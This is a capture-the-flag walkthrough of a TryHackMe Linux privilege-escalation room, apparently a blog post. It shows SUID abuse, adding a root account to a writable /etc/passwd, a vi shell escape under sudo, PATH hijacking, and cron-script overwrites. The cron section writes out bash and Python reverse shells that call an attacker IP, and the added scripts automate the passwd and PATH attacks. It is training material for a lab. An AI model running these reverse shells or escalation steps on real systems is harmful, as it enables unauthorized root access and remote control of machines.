TryHackMe: Common Linux Privesc

ratiros01
7 min read · May 5, 2020

[Task 1] Get Connected

[Task 2] Understanding Privesc

[Task 3] Direction of Privilege Escalation

[Task 4] Enumeration

  1. First, let's SSH into the target machine using the credentials user3:password. This simulates getting a foothold on the system as a normal-privilege user.
ssh user3@<target ip>

2. What is the target’s hostname?

3. Look at the output of /etc/passwd how many “user[x]” are there on the system?

cat /etc/passwd

4. How many available shells are there on the system?

cat /etc/shells

5. What is the name of the bash script that is set to run every 5 minutes by cron?

cat /etc/crontab

6. What critical file has had its permissions changed to allow some users to write to it?

ANS: /etc/pas***

7. Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!

Try LinEnum.sh

I saved it in /opt.

On the attacker's machine, serve the script over HTTP from the directory that holds it:

python -m SimpleHTTPServer 1234

Then on the target, fetch it into /tmp, make it executable and run it:

cd /tmp
wget http://<attacker ip>:1234/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

You can also answer the Task 4 questions from the LinEnum.sh output.
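As an added example (not from the original post or the room), the Task 4 checks and the Task 5 SUID search written as small bash functions. Each takes a file path so it can be pointed at copies of the real files; run_enum applies them to the live system. The list of "stock" SUID directories and the set of critical files checked are my assumptions.

```bash
#!/bin/bash
# Added example (not from the original post): the Task 4 checks and the
# Task 5 SUID search as small bash functions. Each takes a file path so it
# can be run against copies of the real files; run_enum uses the live ones.

# Number of accounts named user<N> in a passwd file (Task 4, question 3).
count_userx() {                      # count_userx PASSWD_FILE
    grep -c -E '^user[0-9]+:' "$1" || true
}

# Login shells in a shells file, ignoring comments and blank lines (question 4).
list_shells() {                      # list_shells SHELLS_FILE
    grep -v -E '^[[:space:]]*(#|$)' "$1" || true
}

# Commands scheduled every 5 minutes in a system crontab (question 5).
# System crontab fields: min hour dom mon dow user command...
cron_every_5() {                     # cron_every_5 CRONTAB_FILE
    awk '$1 == "*/5" { $1 = $2 = $3 = $4 = $5 = $6 = ""; sub(/^ +/, ""); print }' "$1"
}

# Files from the argument list that are group- or world-writable (question 6).
writable_by_others() {               # writable_by_others FILE...
    local f
    for f in "$@"; do
        [ -e "$f" ] && find "$f" -maxdepth 0 \( -perm -020 -o -perm -002 \) -print
    done
    return 0
}

# SUID files outside the directories where stock binaries live (Task 5).
# Reads one path per line on stdin; the "stock" directory list is an assumption.
unusual_suid() {
    grep -v -E '^/(usr/)?(s?bin|lib|lib32|lib64|libexec)/' || true
}

# Enumerate this host for real (the actual Task 4 and Task 5 answers).
run_enum() {
    echo "[*] hostname: $(hostname)"
    echo "[*] user[x] accounts: $(count_userx /etc/passwd)"
    echo "[*] available shells:"; list_shells /etc/shells
    echo "[*] cron jobs every 5 minutes:"; cron_every_5 /etc/crontab
    echo "[*] group/world-writable critical files:"
    writable_by_others /etc/passwd /etc/shadow /etc/sudoers /etc/crontab
    echo "[*] SUID files in unusual locations:"
    find / -perm -4000 -type f 2>/dev/null | unusual_suid
}

if [ "${1:-}" = "--run" ]; then
    run_enum
fi
```

Save it as enum.sh on the target and run `bash enum.sh --run`; the SUID filter is what makes a binary sitting in a home directory jump out of the long default list.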

[Task 5] Abusing SUID/GUID Files

  1. What is the path of the file in user3’s directory that stands out to you?
find / -perm -u=s -type f 2>/dev/null

Also from LinEnum.sh

2. We know that “shell” has the SUID bit set, therefore running it will execute it as the root user! Let's run it!

We can do this by running: “./shell”

cd ~
./shell

3. Congratulations! You should now have a shell as root user, well done!

[Task 6] Exploiting Writeable /etc/passwd

  1. First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user7, with the password “password”

From LinEnum.sh

su user7

2. Having read the information above, what direction privilege escalation is this attack?

ANS: ver*****

3. Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”

What is the hash created by using this command with the salt, “new” and the password “123”?

openssl passwd -1 -salt new 123

4. Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?

ANS: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

5. Great! Now you've got everything you need. Just add that entry to the end of the /etc/passwd file! Because the second field holds a real hash instead of the “x” placeholder, the system checks the password against it directly and never consults /etc/shadow for this account.

nano /etc/passwd

6. Now, use “su” to login as the “new” account, and then enter the password. If you’ve done everything correctly- you should be greeted by a root prompt! Congratulations!

su new
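As an added example (mine, not the author's or the room's), the Task 6 entry built by a function rather than by hand, together with the audit a defender would run against /etc/passwd to catch exactly this: an extra uid 0 account, or an account carrying an inline hash instead of “x”. make_hash wraps the same openssl command as the room; the function names are my own.

```bash
#!/bin/bash
# Added example: building the /etc/passwd entry used in Task 6, plus the
# checks a defender (or you, before trusting a box) would run to spot it.

# MD5-crypt hash exactly as the room does it (needs the openssl CLI).
make_hash() {            # make_hash SALT PASSWORD
    openssl passwd -1 -salt "$1" "$2"
}

# Build a uid 0 / gid 0 entry. A hash in field 2 is honoured directly by
# su/login; the "x" placeholder is what tells the system to look in /etc/shadow.
build_entry() {          # build_entry USERNAME HASH
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Append the entry only if the file is actually writable by us.
add_entry() {            # add_entry PASSWD_FILE USERNAME HASH
    [ -w "$1" ] || { echo "not writable: $1" >&2; return 1; }
    build_entry "$2" "$3" >> "$1"
}

# Audit: report uid 0 accounts other than root and any account carrying an
# inline hash instead of the x/locked placeholders.
audit_passwd() {         # audit_passwd PASSWD_FILE
    local user hash uid gid rest
    while IFS=: read -r user hash uid gid rest; do
        [ -z "$user" ] && continue
        if [ "$uid" = 0 ] && [ "$user" != root ]; then
            echo "extra uid 0 account: $user"
        fi
        case "$hash" in
            x|'*'|'!'|'!!'|'') ;;
            *) echo "inline hash for $user: $hash" ;;
        esac
    done < "$1"
}
```

On the target the attack is `add_entry /etc/passwd new "$(make_hash new 123)"` followed by `su new`; on a box you are defending, `audit_passwd /etc/passwd` should print nothing.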

[Task 7] Escaping Vi Editor

  1. First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user8, with the password “password”
exit
su user8

2. Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?

sudo -l

3. So, all we need to do is open vi as root, by typing “sudo vi” into the terminal.

sudo vi

4. Now, type “:!sh” to open a shell!

id

[Task 8] Exploiting Crontab

  1. First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user4, with the password “password”

I know that there's a cron job running user4's autoscript.sh.

exit
su user4

2. Now, on our host machine- let’s create a payload for our cron exploit using msfvenom.

3. What is the flag to specify a payload in msfvenom?
ANS: -p

4. Create a payload using: “msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R”

Skip this; I'll use bash instead:

bash -i >& /dev/tcp/<attacker ip>/8888 0>&1

5. What directory is the “autoscript.sh” under?

ANS: /home/user4/*******

6. Lets replace the contents of the file with our payload using: “echo [MSFVENOM OUTPUT] > autoscript.sh”

cd /home/user4/Desktop
cat autoscript.sh
echo 'bash -i >& /dev/tcp/<attacker ip>/8888 0>&1' > autoscript.sh
cat autoscript.sh

7. After writing the payload into autoscript.sh, start a netcat listener with “nc -lvp 8888”, then wait for cron to execute the file and for the shell to land!

nc -lvp 8888

Waited 5 minutes; it did not work.

I used a Python reverse shell instead. Just keep trying.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

8. After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!

id

[Task 9] Exploiting PATH Variable

  1. Going back to our local ssh session, not the netcat root session, you can close that now, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user5, with the password “password”
exitsu user5

2. Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?

cd ~
ls
./script

3. Now we know what command to imitate, let's change directory to /tmp.

cd /tmp

4. Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:

echo "[whatever command we want to run]" > [name of the executable we're imitating]

What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating

echo "/bin/bash" > ls

5. Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?

chmod +x ls

(chmod 777 ls also works, but lowercase +x is all that is needed; the capital +X only sets execute on directories or on files that are already executable.)

6. Now, we need to change the PATH variable, so that it points to the directory where we have our imitation “ls” stored! We do this using the command “export PATH=/tmp:$PATH”

export PATH=/tmp:$PATH

Note, this will cause you to open a bash prompt every time you use “ls”. If you need to use “ls” before you finish the exploit, use “/bin/ls” where the real “ls” executable is.

Once you've finished the exploit, you can exit out of root and use “export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH” to put the default directories back in front, letting you use “ls” again! Note that this only demotes /tmp to the end of PATH rather than removing it; to restore the original value exactly, save it before the exploit (“OLD=$PATH”) and reinstate it afterwards (“export PATH=$OLD”).

7. Now, change directory back to user5’s home directory.

cd ~

8. Now, run the “script” file again, you should be sent into a root bash prompt! Congratulations!

./script
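As an added example (mine, not the author's), the Task 9 PATH hijack as three reusable steps, with the payload passed in so it can be dry-run harmlessly, and a restore that puts PATH back exactly as it was. The directory, command name and payload are arguments; SAVED_PATH and the function names are my own.

```bash
#!/bin/bash
# Added example: the Task 9 PATH hijack as reusable steps, with a payload
# supplied by the caller and an exact restore of PATH afterwards.

# Plant DIR/NAME running PAYLOAD and put DIR at the front of PATH.
hijack_path() {          # hijack_path DIR NAME PAYLOAD
    mkdir -p "$1"
    printf '#!/bin/sh\n%s\n' "$3" > "$1/$2"
    chmod +x "$1/$2"
    SAVED_PATH=$PATH
    export PATH="$1:$PATH"
    hash -r               # forget any cached location bash had for NAME
}

# Where a bare command name currently resolves to.
resolve() {              # resolve NAME
    command -v "$1"
}

# Put PATH back exactly as it was before hijack_path ran.
restore_path() {
    export PATH=$SAVED_PATH
    hash -r
}
```

On the target this is `hijack_path /tmp ls /bin/bash`, then `cd ~ && ./script`, then `restore_path` once you are done. If a SUID target ever hands you back a shell that id reports as your own user, make the payload `/bin/bash -p` instead: bash resets its effective uid to the real uid unless started in privileged mode.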
